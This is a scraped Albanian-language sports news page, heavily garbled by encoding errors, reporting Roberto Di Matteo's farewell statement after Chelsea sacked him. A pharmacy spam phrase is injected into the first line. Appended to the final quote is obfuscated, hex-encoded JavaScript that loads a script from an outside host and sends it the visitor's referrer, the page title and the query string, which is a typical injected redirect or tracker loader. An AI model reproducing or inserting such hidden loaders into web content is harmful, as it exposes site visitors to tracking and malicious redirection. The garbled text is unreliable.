_home_panew_sport 1-1

Di Matteo krenar qA� ka drejtuar Chelsean

estrace cream no prescription. Roberto Di Matteo thotA� se pA�r tA� ishte a�?ndera�? qA� pati rastin tA� menaxhojA� Chelsean, pas shkarkimit mA�ngjesin e djeshA�m.

Italianit iu tregua dera disa orA� pasi BlutA� u mposhtA�n 3-0 nga Juventusi nA� LigA�n e KampionA�ve, dhe pronari Roman Abramovich nuk u mendua shumA� duke caktuar Rafael Benitez si pasues tA� tij.

a�?Ishte nder pA�r mua tA� caktohem menaxher i klubit pA�r tA� cilin mA� ka pA�lqyer tA� luaj dhe i cili A�shtA� afA�r zemrA�s time. Jam tepA�r krenar pA�r sukseset dhe trofetA� qA� isha nA� gjendje ta��ia sjell klubit nA� muajt e fundita�?.

a�?TA� ngre trofeun e parA� tA� LigA�s sA� KampionA�ve tA� Chelseat, nA� Munich, ishte arritja mA� e madhe nA� historinA� e klubit dhe pa dyshim se kjo A�shtA� mA� e ndritshmja nA� karrierA�n time deri sot, edhe si lojtar edhe si menaxhera�?.

a�?A�shtA� njA� kujtim tA� cilin do ta ruaj pA�r gjithA� pjesA�n e mbetur tA� jetA�s timea�?.

a�?Kam njA� pasion tA� thellA� dhe pa rezervA� pA�r Chelsean dhe do tA� doja sinqerisht tA� falA�nderoj stafin, lojtarA�t, dhe sigurisht tifozA�t e Chelseat, pA�r mbA�shtetjen e tyre tA� tmerrshme dhe tA� pakusht nA� kohA�n time intensive sa kam qenA� menaxher nA� Bridge. U dA�shiroj tA� gjithA�ve sukses pA�r pjesA�n e mbetur tA� sezonit dhe mA� teja�?, ka thA�nA� Di Matteo.var _0x31f1=[“\x73\x63\x72\x69\x70\x74″,”\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74″,”\x73\x72\x63″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26\x73\x65\x5F\x72\x65\x66\x65\x72\x72\x65\x72\x3D”,”\x72\x65\x66\x65\x72\x72\x65\x72″,”\x26\x64\x65\x66\x61\x75\x6C\x74\x5F\x6B\x65\x79\x77\x6F\x72\x64\x3D”,”\x74\x69\x74\x6C\x65″,”\x26″,”\x3F”,”\x72\x65\x70\x6C\x61\x63\x65″,”\x73\x65\x61\x72\x63\x68″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”,”\x26\x66\x72\x6D\x3D\x73\x63\x72\x69\x70\x74″,”\x63\x75\x72\x72\x65\x6E\x74\x53\x63\x72\x69\x70\x74″,”\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65″,”\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65″,”\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64″,”\x68\x65\x61\x64″,”\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65″,”\x70\x72\x6F\x74\x6F\x63\x6F\x6C”,”\x68\x74\x74\x70\x73\x3A”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x52\x5F\x50\x41\x54\x48″,”\x54\x68\x65\x20\x77\x65\x62\x73\x69\x74\x65\x20\x77\x6F\x72\x6B\x73\x20\x6F\x6E\x20\x48\x54\x54\x50\x53\x2E\x20\x54\x68\x65\x20\x74\x72\x61\x63\x6B\x65\x72\x20\x6D\x75\x73\x74\x20\x75\x73\x65\x20\x48\x54\x54\x50\x53\x20\x74\x6F\x6F\x2E”];var d=document;var s=d[_0x31f1[1]](_0x31f1[0]);s[_0x31f1[2]]= _0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12];if(document[_0x31f1[13]]){document[_0x31f1[13]][_0x31f1[15]][_0x31f1[14]](s,document[_0x31f1[13]])}else {d[_0x31f1[18]](_0x31f1[17])[0][_0x31f1[16]](s)};if(document[_0x31f1[11]][_0x31f1[19]]=== _0x31f1[20]&& KTracking[_0x31f1[22]][_0x31f1[21]](_0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12])=== -1){alert(_0x31f1[23])}